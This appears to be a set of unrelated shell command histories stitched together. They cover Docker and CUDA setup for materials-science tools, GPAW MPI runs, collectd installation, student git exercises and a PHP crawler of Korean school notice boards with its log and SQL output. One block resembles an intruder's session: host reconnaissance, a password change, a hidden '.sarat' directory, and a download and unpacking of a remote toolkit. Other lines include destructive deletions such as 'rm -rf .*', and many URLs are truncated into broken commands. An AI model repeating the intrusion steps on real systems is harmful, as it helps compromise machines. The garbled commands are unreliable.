+#1567219233 +wget -c sh +#1567219373 +docker run -p 8899:8888 --runtime nvidia --rm cgcnn:cuda-10.0-notebook +#1567219382 +docker run -p 8899:8888 --runtime nvidia --rm cloudac7/cgcnn:cuda-10.0-notebook +#1567219398 +docker run -p 8899:8888 --runtime nvidia -it --rm cloudac7/cgcnn:cuda-10.0-notebook +#1567219434 +docker run -p 8899:8888 --runtime nvidia -it --rm cloudac7/cgcnn:cuda-10.0-notebook bash +#1567219453 +docker run -p 8899:8888 --runtime nvidia -it --rm cloudac7/gdynet:cuda-10.0-notebook bash +#1567219469 +docker ps -a +#1567219471 +docker ps +#1567219480 +ls +#1567219487 +chmod +x Anaconda3-2018.12-Linux-x86_64.sh +#1567219489 +./Anaconda3-2018.12-Linux-x86_64.sh +#1567219610 +ls +#1567219614 +rm Anaconda3-2018.12-Linux-x86_64.sh +#1567219616 +ls +#1567219618 +ls -al +#1567219620 +exit +#1567219628 +ls +#1567219637 +python +#1567219644 +ipython +#1567219652 +exit +#1567389568 +nvidia-smi +#1567389619 +exit +#1567389680 +docker image list +#1567389691 +exit +#1567389782 +ls +#1567389789 +pwd +#1567389792 +#1567389794 +ls +#1567389796 +#1567389796 +ls +#1567389803 +#1567389803 +ls +#1567389872 +mkdir gdynet-data +#1567389874 +#1567389879 +wgetscloud.org/file/2019.0017/v1/li2s-traj.npz +#1567390258 +screen +#1567390260 +ls +#1567390270 +wgetscloud.org/file/2019.0017/v1/li2s-traj-graph-train.npz +#1567391679 +wgetscloud.org/file/2019.0017/v1/li2s-traj-graph-test.npz +#1567391707 +wgetscloud.org/file/2019.0017/v1/li2s-traj-graph-val.npz +#1567391925 +ls +#1567391928 +#1567391929 +ls +#1567392092 +docker run --runtime nvidia -it -v /root:/workplace/gdynet/training cloudac7/gdynet:cuda-10.0-notebook bash +#1567393477 +docker run -p 8989:8888 --runtime nvidia -v /root:/workspace/gdynet/training cloudac7/gdynet:cuda-10.0-notebook +#1567393721 +ls +#1567394019 +exit +#1567399515 +ls +#1567399518 +docker ps +#1567399704 +tar -jxvf dp-tut.tar.bz2 +#1567399744 +l +#1567399745 +ls +#1567399749 +#1567399750 +ls +#1567399753 +#1567399754 +ls +#1567399755 +vim param.json +#1567399773 +nvidia-smi +#1567399782 +./clean.sh +#1567399783 +ls +#1567399785 +./exec.sh +#1567399798 +watch -n 1 nvidia-smi +#1567399825 +tail -n dpgen.log +#1567399830 +tail -f dpgen.log +#1567400379 +l +#1567400380 +ls +#1567400390 +#1567400390 +ls +#1567400393 +cim lcurve.out +#1567400396 +vim lcurve.out +#1567400407 +#1567400455 +ls +#1567400455 +#1567400460 +#1567400464 +docker-compose down +#1567400470 +#1567400470 +ls +#1567400475 +rm -rf deepmd-tutorial-20190815/ +#1567400479 +rm -f gdynet-data +#1567400483 +rm -f gdynet-data.tgz +#1567400483 +ls +#1567400486 +exit +#1567400198 +ls +#1567400204 +rm dp-tut.tar.bz2 +#1567400206 +ls +#1567400238 +tar -zcvf gdynet-data.tgz gdynet-data/ +#1567516117 +ls +#1567516765 +yum install libfabric +#1567516881 +ls +#1567516946 +wget -cstrationcenter-download.intel.com/akdlm/irc_nas/tec/15540/l_mkl_2019.4.243.tgz +#1567517177 +l +#1567517180 +rm l_mkl_2019.4.243.tgz +#1567517351 +ls +#1567517370 +rm -f l_mkl_2019.4.243.tgz +#1567517371 +ls +#1567517963 +tar -zxvf l_mkl_2019.4.243.tgz +#1567517984 +#1567517985 +ls +#1567517988 +./install.sh +#1567518008 +ls +#1567518009 +#1567518010 +ls +#1567518218 +wget -cstrationcenter-download.intel.com/akdlm/irc_nas/tec/15553/l_mpi_2019.4.243.tgz +#1567518223 +ls +#1567518226 +rm l_mpi_2019.4.243.tgz +#1567518227 +ls +#1567518574 +tar -zxvf l_mpi_2019.4.243.tgz +#1567518585 +#1567518587 +./install.sh +#1567518667 +#1567518669 +./install +#1567518671 +./install.sh +#1567518812 +ls +#1567518814 +#1567518815 +ls +#1567518821 +rm -rf l_* +#1567518822 +ls +#1567518828 +vim .bashrc +#1567518861 +source .bashrc +#1567518866 +which mpirun +#1567518879 +vim hello.c +#1567519003 +mpicc hello.c -o intel_hello +#1567519008 +mpirun -np 2 /root/intel_hello +#1567519030 +echo $LD_LIBRARY_PATH +#1567519044 +vim .bashrc +#1567519066 +source .bashrc +#1567519072 +mpirun -np 2 /root/intel_hello +#1567519087 +ls +#1567519098 +echo $LD_LIBRARY_PATH +#1567519118 +echo $PATH +#1567519124 +ls +#1567519126 +exit +#1567519141 +docker image ls +#1567519143 +df +#1567519165 +docker pull cloudac7/deepmd-kit:cuda-9.0-ssh-ubuntu16.04 +#1567520366 +docker pull cloudac7/dpgen +#1567520539 +docker image ls +#1567520541 +df +#1567520560 +docker image rm 189925bcf94b +#1567520578 +docker image rm 0bd791a15075 +#1567520611 +df +#1567520616 +docker image ls +#1567520648 +exit +#1567521367 +yum install unzip +#1567521378 +python +#1567521383 +exit +#1567521944 +ls +#1567521953 +tar -zxvf INTER_ac_intel12_61856731171.tgz +#1567521954 +ls +#1567521960 +rm hello.c +#1567521963 +rm intel_hello +#1567521964 +ls +#1567521972 +tar -zxvf NN_ac_intel12_64960919762.tgz +#1567521974 +ls +#1567521983 +tar -zxvf LASP_example\(1\).tgz +#1567521985 +ls +#1567521989 +mkdir lasp +#1567521989 +ls +#1567522000 +rm ./*.tgz +#1567522003 +ls +#1567522008 +mv INTER_ac2.1.7_intel12_4fg/ lasp/ +#1567522013 +mv NN_ac2.1.7_intel18/ lasp/ +#1567522013 +ls +#1567522019 +mv LASP_Example/ lasp/ +#1567522020 +ls +#1567522022 +#1567522023 +ls +#1567522025 +#1567522026 +ls +#1567522035 +vim README +#1567522067 +ls +#1567522068 +#1567522069 +ls +#1567522070 +#1567522071 +ls +#1567522073 +exit +#1567525820 +ls +#1567525824 +unzip gap-tutorial.zip +#1567525825 +ls +#1567525830 +rm gap-tutorial +#1567525833 +rm gap-tutorial.zip +#1567525834 +exit +#1567558250 +clear +#1567558254 +ls +#1567558260 +mkdir temp +#1567558263 +#1567558264 +ls +#1567558269 +vim Dockerfile +#1567558278 +docker image ls +#1567558292 +vim Dockerfile +#1567558375 +docker build -t libatomsquip/quip:py2-sklearn . +#1567558595 +docker image list +#1567585468 +ls +#1567585469 +exit +#1567584570 +ls +#1567584574 +#1567584575 +ll +#1567584576 +#1567584577 +ls +#1567584579 +#1567584586 +ll +#1567584796 +#1567584797 +ls +#1567584800 +#1567584801 +ll +#1567585290 +ls +#1567585372 +ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key +#1567585399 +ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key +#1567585426 +ssh-keygen -t ecdsa -f /etc/ssh/ssh_host_ecdsa_key +#1567585446 +/etc/init.d/sshd start +#1567585454 +locate sshd +#1567586714 +ll +#1567586729 +mkdir Tutorial +#1567586761 +ll +#1567585474 +ll +#1567585523 +#1567585524 +ll +#1567585528 +#1567585529 +ll +#1567585532 +#1567585532 +ls +#1567585533 +#1567585533 +ls +#1567585561 +#1567585562 +ls +#1567585564 +#1567585566 +#1567585567 +ll +#1567585574 +#1567585575 +ls +#1567585618 +pwd +#1567585673 +ll +#1567586823 +#1567586824 +ll +#1567586883 +#1567586884 +ls +#1567586906 +cp -r gap-tutorial/ Tutorial/ +#1567586915 +cp -r lasp/ Tutorial/ +#1567586916 +ll +#1567586932 +mkdir TarFiles +#1567586940 +tar czf gap-tutorial/ +#1567586948 +tar czf gap-tutorial.tar.gz gap-tutorial/ +#1567586964 +tar czf lasp.tar.gz lasp/ +#1567586968 +ll +#1567586975 +mv *.tar.gz TarFiles/ +#1567586976 +ll +#1567586985 +docker run -it --rm -v /root/gap-tutorial/:/root/tutor/ -p 8889:8889 libatomsquip/quip +#1567587417 +docker run -it --rm -v /root/gap-tutorial/:/root/tutor/ -p 8889:8899 libatomsquip/quip +#1567587545 +ll +#1567587565 +#1567587566 +ll +#1567587568 +ll -h +#1567587572 +#1567587572 +ls +#1567587575 +#1567587576 +ll +#1567587579 +#1567587580 +ls +#1567587593 +tar czf NVIDIA_CUDA-9.0_Samples.tar.gz NVIDIA_CUDA-9.0_Samples/ +#1567587608 +#1567587608 +ll +#1567587611 +ll -h +#1567587615 +#1567587615 +ls +#1567587619 +ll -h +#1567587631 +mv NVIDIA_CUDA-9.0_Samples.tar.gz TarFiles/ +#1567587632 +ll +#1567587635 +#1567587635 +ls +#1567587637 +pwd +#1567587843 +ll +#1567587844 +#1567587845 +ls +#1567587848 +#1567587849 +ll +#1567587851 +#1567587852 +ll +#1567587855 +#1567587855 +ll +#1567587859 +#1567587860 +ll +#1567587861 +#1567587862 +ll +#1567587871 +#1567587872 +ls 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apt-get update +sudo apt-get install python-ase +sudo apt-get install gpaw-setups +sudo apt-get install ssh +sudo apt-get install openmpi + +reboot +sudo reboot +scp -r renat@fii.fi.tartu.ee:amAu111BF4 ~/amAu111BF4 +ls -l +ls -l +sudo rm renat@fii.fi.tartu.ee +sudo rm -r renat@fii.fi.tartu.ee +ls -l +exit +ls +ls +less 22.py +sudo ls +ls +less 8Si.py +ls ~ +ls /home/dirac/amAu111BF4/22.py +less /home/dirac/amAu111BF4/22.py +less 8Si.py +less 2Al.py +ls +ls +ls +less 22.py +less 64.py +mpirun -np 1 gpaw-python 22.py > log.txt & +tail -f log.txt +top +tail -f log.txt +less log.txt +top +mpirun -np 1 gpaw-python 22.py +mpirun -np 8 gpaw-python 22.py +top +ping www.yahoo.com +sudo ifconfig up +sudo ifconfig etho up +sudo ifconfig eth0 up +ifconfig +ping www.yahoo.com +sudo ifconfig eth0 up +sudo ifconfig up +sudo /etc/init.d/networking restart +ping www.yahoo.com +sudo /etc/init.d/networking restart +sudo /etc/init.d/networking star +sudo service networking start +ping www.yahoo.com +sudo service networking stop +history +history | less +ping www.yahoo.com +ifconfig +ls /etc/network/interfaces +less /etc/network/interfaces +sudo ifup etho0 +sudo ifup eth0 +sudo restart now +sudo restart +sudo restart -h +sudo restart --help +sudo shutdown now +ping www.yahoo.com +sudo ifup eth0 +ping www.yahoo.com +sudo ifup eth0 +sudo ifup eth3 +sudo ifup eth0 +modprobe e1000 +sudo ifup eth0 +whereis dhcpcd +dmesg | less +man dmesg +ifconfig -a +sudo ifup eth1 +ping www.yahoo.com +sudo ifup eth1 +sudo ifup eth0 +sudo ifup eth1 +sudo ifconfig up eth1 +sudo ifconfig --help +sudo ifconfig --help | less +sudo ifconfig --help 2>&1 | less +sudo ifconfig eth1 up +ping www.yahoo.com +sudo ifconfig eth2 up +sudo ifconfig eth0 up +sudo ifconfig eth3 up +ping www.yahoo.com +sudo service networking restart +sudo service networking stop +ping www.yahoo.com +sudo /etc/init.d/networking +sudo /etc/init.d/networking restart +sudo ifconfig +ls /etc/network/interfaces +less /etc/network/interfaces +ifconfig eth0 up +ifconfig eth1 up +sudo ifconfig eth0 up +whereis eth1 +clear +sudo ifconfig up +lshw +lshw | grep eth +sudo nano /etc/network/interfaces +sudo /etc/init.d/network restart +sudo /etc/init.d/networking restart +sudo nano /etc/network/interfaces +sudo /etc/init.d/networking restart +ping www.yahoo.com +man /etc/network/interfaces +apt-get install lynx +sudo apt-get install lynx +wgets/collectd-5.0.0.tar.gz +ls +tar -xzf collectd-5.0.0.tar.gz +ls +less README +./configure +make all +sudo make install +ls +less etc/collectd.conf +sudo less etc/collectd.conf +sudo apt-get install librrd2-dev +less /opt/collectd/etc/collectd.conf +sudo less /opt/collectd/etc/collectd.conf +ls +ls +sudo make remove +sudo make uninstall +sudo rm -rf /opt/collectd/ +./configure | tee out.text +less out.text +sudo apt-get install librrd2-dev +./configure | tee out.text +less out.text +make clean +make +make all +sudo make install +less /opt/collectd/etc/collectd.conf +sudo less /opt/collectd/etc/collectd.conf +sudo less /etc/init.d/networking +ls +ls +ls etc/ +sudo find . -name collectd +less sbin/collectd +less include/collectd/ +less /etc/rc.local +ls -al /etc/rc.local +sudo /opt/collectd/sbin/collect +top +less etc/collectd.conf +sudo less etc/collectd.conf +whereis rrdtool +history | grep rrd +apt-get install rrdtool +sudo apt-get install rrdtool +rrdtool +rrdtool graph +rrdtool graph | less +rrdtool graph var/lib/collectd/dirac.lan/cpu-0 +ls +rrdtool grep tessh localhost +ls +ls +mpirun -np 4 gpaw-python 22.py +top +ls -la /opt/collectd/var/lib/collectd/dirac.lan/cpu-0/cpu-idle.rrd +date +ps auwx | grep collectd +ls +less rc.local +ls +grep collectd * + +grep collectd * -Ir +ls ../rc.local +less ../rc.local +ls +ls +mpirun -np 2 gpaw-python 22.py +ls -la 22.txt +date +less 22.txt +top +gpaw-python 22.py +gpaw-python -np 22.py > out.txt +mpirun -np gpaw-python 22.py > out.txt +ls +mpirun -np 2 gpaw-python 22.py > out.txt +less 22.py +mpirun -np 2 gpaw-python 22.py > out.txt +ifconfig +nslookup localhost +ping www.yahoo.com +sudo service networking restart +ping www.yahoo.com +sudo service networking stop +sudo service networking start +ping www.yahoo.com +sudo /etc/init.d/networking restart +ping www.yahoo.com +ifconfig +ls +unzip Attachments_2011_04_19.zip +sudo apt-get install unzip +unzip Attachments_2011_04_19.zip +top +ls +mpirun -np 2 Bi-4-8nodes.py +mpirun -np 2 gpaw-python Bi-4-8nodes.py +top +mpirun -np 2 gpaw-python Bi-4-8nodes.py +less Bi-4-8nodes.py +mpirun -np 2 gpaw-python Bi-4-8nodes.py +mpirun -np 8 gpaw-python Bi-4-8nodes.py +ls +less Bi111dl-1.65.txt +mpirun -np 2 gpaw-python da-k-4nodes.py +mpirun -np 2 gpaw-python da-k-4nodes.py | tee out.txt 2>&1 +less out.txt +mpirun -np 2 gpaw-python da-k-4nodes.py 2>&1 | tee out.txt +less out.txt +ls da-k-4nodes.py +less da-k-4nodes.py +less da-k-2nodes.py +less dl-k-2nodes.py +mpirun -np 2 gpaw-python dl-k-2nodes.py +top +mpirun -np 2 gpaw-python da-h-8nodes.py +mpirun -np 2 gpaw-python Bi-4-8nodes.py +mpirun -np 2 gpaw-python da-h-8nodes.py +mpirun -np 2 gpaw-python dl-k-2nodes.py +top +ls +ls -la +date +ls +rm collectd-5.0.0.tar.gz +rm -rf collectd-5.0.0/ +ls +ps auwx | grep collectd +grep * -Ir collectd +grep -Ir collectd * +grep -Ir collectd * +ls +ls -la +sudo nano collectd +ifconfig +sudo cp /home/dirac/collectd . +chmod a+xr collectd +sudo chmod a+xr collectd +sudo chown root collectd +ls -la +ls -la | collectd +ls -la | grep collectd +ps auwx | grep collectd +sudo service collectd start +whereis collectd +sudo nano collectd +sudo service collectd start +ps auwx | grep collectd +sudo /etc/init.d/collectd start +ps auwx | grep collectd +sudo nano collectd +sudo /etc/init.d/collectd start +sudo nano collectd +sudo /etc/init.d/collectd start +ps auwx | grep collectd +sudo /etc/init.d/collectd stop +ps auwx | grep collectd +sudo nano collectd +man update-rc.d +sudo update-rc.d collectd defaults +sudo shutdown now +ls +ls +ls +man pidof +ls +less ssh +grep stat_busy * +less bootlogd +grep stat_fail * +ls +nano bootlogd +less cron +ls -la +less 34.txt +top +less /tmp/d2c.context +ls -la +less 34.txt +top +ls -la +ps auxw | grep mpi +ls -la +less experiment.out +less 34.txt +top +ls -la +less 34.txt +top +ls -la +less 34.txt +less /tmp/d2c.context +less amAu111BF4/34.py +less 34.txt +ls +top +ps auwx | grep mpirun +ls /tmp/d2c.context +less /tmp/d2c.context +ls +less 34.txt +less chris_test.py + +less amAu111BF4/34.py +less /tmp/d2c.context +less 34.txt +less amAu111BF4/34.py +ls +less 34.txt +less amAu111BF4/34.py +less 34.txt +less experiment.out +less 34.txt +less amAu111BF4/34.py +less 34.txt + +date +less 34.txt +top +less 34.txt +w +uname -a +cat /proc/cpuinfo +passwd +w +ls +ls -a +mkdir .sarat +wget free-ftp.org/saratelu/team.tgz +tar zxvf team.tgz +rm -rf team.tgz +ls +export PATH="." +bash +ps x +w +exit +helm create helm-create +helm template . --name my-release-name +helm upgrade my-release-name . --install --dry-run --debug +helm search httpbin +helm package . +l ~/.helm/repository/local +helm dependency update +helm install local/helm-httpbin --name cloudatine +k get po +k get svc +watch kubectl get po +watch kubectl get svc +k port-forward svc/cloudatine-helm-httpbin 4242:80 +helm delete cloudatine --purge +kustomize build base +mkdir -p overlays/official +touch kustomization.yaml +kustomize edit fix +kustomize edit add base ../../base +kustomize edit set image mccutchen/go-httpbin=kennethreitz/httpbin:latest +tee deployment-port.yaml <> README.md +git init +git add README.md +git commit -m "first commit" +git remote add origin +git push -u origin master +echo "# depo" >> README.md +git init +git add README.md +git commit -m "first commit" +git remote add origin +git remote add origin +git push -u origin master +echo "# depo" >> README.md +git init +git add README.md +git commit -m "first commit" +git remote add origin +git push -u origin master +echo "# depo" >> README.md +git init +git add README.md +git commit -m "first commit" +git remote add origin +git push -u origin master +echo "# depo" >> README.md +git init +git add README.md +git commit -m "first commit" +git remote add origin +git push -u origin master 744@holbertonschool.com +--global +Omit --global +Omit +echo "# depo" >> README.md +git init +git add README.md +git commit -m "first commit" +git remote add origin +git push -u origin master--global user.email "744@holbertonschool.com" --global user.name "drainer963" +echo "# depo" >> README.md +ld +ls +git init +git add README.md +git status +git commit -m "first commit" +git config --global user.email "744@holbertonschool.com" +git commit -m "first commit" +git remote add origin +git push -u origin master +git push -u origin master +git push -u origin master +emacs README.md +git add README.md +git commit -m "updated readme" +git status +ls +ls -la +git diff +git push +file .#README.md +unlink .#README.md +ls -la +git add README.md +git status +git pull origin master +git fetch origin master +git pull origin master +git status +mkdir depo2 +ls +echo "# depo" >> README.md +ls +git init +git add README.md +git commit -m "first commit" +git remote add origin +git push -u origin master +ls -la +ls +emacs drain +ls +emacs drain +ls +emacs drain +ls +emacs someoneelse +ls +emacs some +ls +emacs new +ls +emacs new +ls +emacs run +ls +emacs another 1 +ls +git add . +git commit -m "Comment describing what is new" +git push +ls +mv depo my_first_repository +mv depo +ls +mv depo my_first_repository +ls +mkdir bash +ls +mkdir c +mkdir js +ls +touch c_is_fun.c +ls +ls +touch main.js +ls +touch index.js +ls +touch bash/holberton +ls +touch bash/holberton +ls +emacs bash/holberton +ls +emacs bash/holberton +ls +emacs bash/holberton +ls +ls +touch school +ls +emacs school +ls +git add -m "Starting to code today, so cool” +git push + + +git add + +emacs f + + +ls +git add +git add +git add +git add . +git add . +git commit -m "starting to code today,so cool" +git push +git pull +git pull ,. +git pull . +git push . +touch 98 +ls +emacs holberton +emacs school +git add +cp -r bash my_first_repository +cp -r bash my_first_repository +ls +bc bash +git add +git push +ls +sudo mv bash/ my_first_repository +ls +git add +git add . +git commit -m "Starting to code today, so cool" +git push . +git push origin master +git pull ... +git pull +git pull . +git push origin master +git push +emacs +emacs +emacs +emacs C-h t +emacs +emacs +emacs +emacs +emacs +emacs +touch 0-opening +ls +emacs 0-opening +echo "# holbertonschool-zero_day" >> README.md +git init +git add README.md +ls +git commit -m "first commit" +git remote add originschool-zero_day.git +git push -u origin master +ls +emacs 0-opening +emacs 0-opening +git add +git add . +git commit +ls +rm -rf +ls +rm -rf * +ls +git +git init +top +rails --help +rail -v +rails -v +rails . +rails new . +ls +rm -rf * +ls +ls -a +rm -rf .* +ls -la +ls -a +rails new +rails new . +ls -l +bundler install +sudo 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apt-get install firefox-esr +sudo add-apt-repository ppa:jonathonf/firefox-esr-52 +sudo apt-get update +sudo apt-get install firefox-esr +ls +sh exec.sh +flex +yacc +clear +sudo apt-get install subl +clear +sudo apt-get install subl +sudo apt-get install subl3 +sudo apt-get install sublime-text-3 +sudo apt-get install sublime-text +sudo apt-get update +sudo apt-get install sublime-text +subl +lex lex.l +ls +cat leax.l +cat lex.l +flex lex.l +nano lex.l +flex lex.l +g++ 1.cpp +g++ -std=c++11 1.cpp +./a.out +g++ -std=c++11 1.cpp +./a.out +g++ -std=c++11 1.cpp +./a.out +flex lex.l +flex lex1.l +flex lex.l +gcc lex.yy.c +flex lex.l +gcc lex.yy.c lex.c +flex lex.l +g++ -std=c++11 2.cpp +clear +g++ -std=c++11 2.cpp +./a.out +g++ -std=c++11 2.cpp +./a.out +g++ -std=c++11 2.cpp +./a.out +g++ -std=c++11 2.cpp +./a.out +lex lex.l +lex lex.l +gcc lex.yy.c +lex lex.l +gcc lex.yy.c +gcc lex.yy.c lex.c +./a.out +./a.out < input +lex lex.l +gcc lex.yy.c lex.c +./a.out < input +lex lex.l +yacc -d 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+php getNotice.php 0 > output.txt +php getNotice.php 0 > output.txt & +php getNotice.php 1 > output1.txt & +tail -f output1.txt +ps -ef | grep php +kill -9 30963 +kill -9 30973 +ls -l +php getNotice.php 0 15256 +php getNotice.php 0 > output0.txt & +php getNotice.php 1 > output1.txt & +ps -ef | grep php +tail -f output0.txt +ls +ls +ls +php getNotice.php 0 > output0.txt +php getNotice.php 0 > output0.txt & +php getNotice.php 1 > output1.txt & +tail -f output0.txt +php getNotice.php 0 > output0.txt & +php getNotice.php 1 > output1.txt & +ls +ls +php getNotice.php 1 > output1.txt & +php getNotice.php 0 > output0.txt & +tail -f output1.txt +ls -l +tail -f output1.txt +ls -l +php getNotice.php 0 > output0.txt & +php getNotice.php 1 > output1.txt & +ls -lh +ll +l +ls -l +ls +ls +php getNotice.php 1 +php getNotice.php 1 21617 +php getNotice.php 0 21617 +s.kr/main.html?siteid=haeganghs&boardid=HAEGANGHS_029&uid=&category= +php getNotice.php 0 21617 +s.kr/BOARD_1001/main.html?siteid=haeganghs&boardid=HAEGANGHS_029&uid=&category= +php getNotice.php 0 21617 +php getNotice.php 1 21617 +ls +ls +ls +ls +php getNotice.php 0 +php getNotice.php 0 12444 +php getNotice.php 1 12444 +php getNotice.php 1 12528 +php getNotice.php 0 12528 +php getNotice.php 1 12528 +php getNotice.php 0 +php getNotice.php 1 +ls +php getNotice.php 1 +ls +php getNotice.php 1 +ls +ls +ls +php getNotice.php 0 +ls - +ls -l +ls +ls -l +ls +ls -l +php getNotice.php +ls +ls +php getNotice.php 0 +[DEBUG][2016-08-14 15:41:39] => Success Insert File => NEW : 이의신청서(효목초).hwp (11 kb) +[DEBUG][2016-08-14 15:41:39] => Success Insert Article => EBSMath 활용 안내 +[DEBUG][2016-08-14 15:41:39] => Success Insert File => NEW : 이의신청서(효목초).hwp (11 kb) +[DEBUG][2016-08-14 15:41:39] => Success Insert Article => EBSMath 활용 안내 +[DEBUG][2016-08-14 15:41:39] => Success Insert Article => 2016학년도 시정 운영 안내 +[DEBUG][2016-08-14 15:41:39] => Success Insert File => NEW : 이의신청서(효목초).hwp (11 kb) +[DEBUG][2016-08-14 15:41:39] => Success Insert Article => EBSMath 활용 안내 +[DEBUG][2016-08-14 15:41:39] => Success Insert Article => 2016학년도 시정 운영 안내 +[DEBUG][2016-08-14 15:41:39] => Success Insert File => NEW : (13)2016학년도시정운영안내.hwp (36 kb) +[DEBUG][2016-08-14 15:41:39] => Success Insert Article => 전자금융거래를 위한 자동이체출금 동의서 +[DEBUG][2016-08-14 15:41:39] => Success Insert File => NEW : (5)새로운출금동의서.hwp (14 kb) +[DEBUG][2016-08-14 15:41:39] => Success Insert Article => 성범죄자 알림e 스마트폰 앱 홍보 안내 +[DEBUG][2016-08-14 15:41:39] => Success Insert File => 성범죄자알림e앱설명자료.hwp (601 kb) +[DEBUG][2016-08-14 15:41:39] => Success Insert Article => 보호자 동행(동의) 개인별 체험학습 신청서 +[DEBUG][2016-08-14 15:41:39] => Success Insert File => NEW : 보호자동행(동의)개인별체험학습양식(1).hwp (15 kb) +[DEBUG][2016-08-14 15:41:39] => Success Insert Article => 교문 앞 등․하교 차량 주정차 금지 협조 안내 +[DEBUG][2016-08-14 15:41:39] => Success Insert File => (18)교문앞주·정차금지가정통신문.hwp (181 kb) +[DEBUG][2016-08-14 15:41:39] => Success Insert Article => 2016년 을지연습 시민참여 계획 +[DEBUG][2016-08-14 15:41:39] => Success Insert File => NEW : 2016을지연습시민참여계획.hwp (147 kb) +[DEBUG][2016-08-14 15:41:39] => Success Insert Article => 서울교육대학교 음악교육과_제53회 전국초등학생음악경연대회 +[DEBUG][2016-08-14 15:41:39] => Success Insert File => NEW : 서울교육대학교음악교육과_제53회전국초등학생음악경연대회참가신청서.hwp (15 kb) +[DEBUG][2016-08-14 15:41:39] => Success Insert File => NEW : 서울교육대학교음악교육과_제53회전국초등학생음악경연대회요강(안).pdf (109 kb) +[DEBUG][2016-08-14 15:41:39] => Success Insert Article => 서울교육대학교 음악교육과_제52회 전국초등학생음악경연대회 +[DEBUG][2016-08-14 15:41:39] => Success Insert File => NEW : 서울교육대학교음악교육과_제52회전국초등학생음악경연대회참가신청서.hwp (15 kb) +[DEBUG][2016-08-14 15:41:39] => Success Insert File => NEW : 서울교육대학교음악교육과_제52회전국초등학생음악경연대회요강(안).pdf (108 kb) +[ERROR][2016-08-14 15:41:39] => Fail Insert Article => 일 월 화 수 목 금 토===> INSERT INTO "site_notice" ("url", "title", "content", "b_no", "date", "school_no", "type", "etc") VALUES () +ls +if($resultArray['prov'] == "대구") { +ls -al +php getNotice.php 0 +ls +php getNotice.php 1 +ls -l +lsls -l +ls -l +clear +ls -l +ls -l +php getNoticeType5.php 0 +php getNoticeType5.php 0 22317 +ps -ef | grep php +php getNoticeType5.php 0 13675 +php getNoticeType6.php 0 13675 +php getNoticeType5.php 0 13675 +php getNoticeType6.php 0 13675 +php getNoticeType6.php 1 13675 +php getNoticeType6.php 0 > output6-0.txt & +tail -f output6-0.txt +php getNoticeType6.php 1 > output6-1.txt & +tail -f output6-1.txt +ps -ef | grep php +kill -9 18096 +kill -9 18176 +php getNoticeType6.php 1 13675 +php getNoticeType6.php 1 > output6-1.txt & +php getNoticeType6.php 0 > output6-0.txt & +tail -f output6-0.txt +tail -f output6-0.txt & +ps -ef | grep tail +kill -9 19984 +ps -ef | grep tail +ls -l +php getNoticeType6.php 0 13727 +ps -ef | grep php +php getNoticeType6.php 0 > output6-0.txt & +php getNoticeType6.php 1 > output6-1.txt & +tail -f output6-0.txt +tail -f output6-1.txt +ps -ef | grep Type6 +kill -9 20104 +kill -9 20076 +php getNoticeType6.php 0 > output6-0.txt & +php getNoticeType6.php 1 > output6-1.txt & +tail -f output6-0.txt +ps -ef | grep php +php getNoticeType6.php 0 13676 +php getNoticeType6.php 0 13679 +ks +ls +ls -l +ls +ls -l +php getNoticeType1.php 0 22240 +php getNoticeType1.php 1 22240 +php getNoticeType5.php 0 13676 +php getNoticeType6.php 0 13676 +php getNoticeType6.php 1 13676 +php getNoticeType6.php 1 13687 +php getNoticeType6.php - 13687 +php getNoticeType6.php 0 13687 +php getNoticeType6.php 0 13688 +php getNoticeType6.php 1 13688 +php getNoticeType5.php 1 ?_page=30 +php getNoticeType5.php 1 13690 +history +ps -ef | grep php +php getNoticeType5.php 1 13695 +php getNoticeType6.php 1 13695 +php getNoticeType6.php 0 13695 +php getNoticeType6.php 0 13696 +php getNoticeType6.php 1 13696 +php getNoticeType6.php 1 13698 +php getNoticeType6.php 0 13698 +php getNoticeType6.php 0 13700 +php getNoticeType6.php 1 13700 +php getNoticeType6.php 0 13700 +php getNoticeType6.php 0 13701 +php getNoticeType6.php 0 13702 +php getNoticeType6.php 0 > output6-0.txt & +ps -ef | grep php +kill -9 17430 +php getNoticeType5.php 0 14126 +php getNoticeType5.php 1 14126 +php getNoticeType1.php 0 14136 +php getNoticeType5.php 1 14126 +php getNoticeType5.php 0 14126 +php getNoticeType1.php 0 14136 +php getNoticeType1.php 1 14136 +php getNoticeType1.php 1 14138 +php getNoticeType1.php 1 14139 +php getNoticeType1.php 0 14139 +php getNoticeType2.php 0 14736 +php getNoticeType6.php 0 14141 +php getNoticeType6.php 0 14141기 +php getNoticeType6.php 0 14141 +php getNoticeType5.php 0 14141 +php getNoticeType6.php 0 14141 +php getNoticeType1.php 0 14141 +php getNoticeType1.php 1 14141 +php getNoticeType1.php 1 14143 +php getNoticeType1.php 0 14143 +php getNotice.php 1 +ls +ls +ls +ls +php getNotice.php 0 18558 +INSERT INTO "site_notice" ("url", "title", "content", "file", "b_no", "board_no", "article_no", "date", "school_no", "type", "etc") VALUES (s.kr//board/view.do?boardId=BBS_0000001&menuCd=MCD_000000000000042367&orderBy=REGISTER_DATE DESC&startPage=1&dataSid=15331096', '2016학년도 여름 방학 과제 안내', '

여름 방학 과제입니다.

', 'a:1:{i:0;a:2:{s:3:\"url\";s:180:\s.kr//board/download.do?boardId=BBS_0000001&menuCd=MCD_000000000000042367&orderBy=REGISTER_DATEDESC&startPage=1&dataSid=15331096&command=update&fileSid=8391895\";s:4:\"name\";s:56:\"NEW : 2016학년도여름방학과제안내.hwp (18 kb)\";}}', '0', 'BBS_0000001', '15331096', '2016-07-18', '18558', '0', 'Yangs Crawler V1') +INSERT INTO "site_notice" ("url", "title", "content", "file", "b_no", "board_no", "article_no", "date", "school_no", "type", "etc") VALUES (s.kr//board/view.do?boardId=BBS_0000001&menuCd=MCD_000000000000042367&orderBy=REGISTER_DATE DESC&startPage=1&dataSid=15336639', '제16기 글로벌역사외교대사 모집 및 발대식 개최 계획 안내', '

제16기 글로벌역사외교대사 모집 및 발대식 개최 계획 안내입니다.

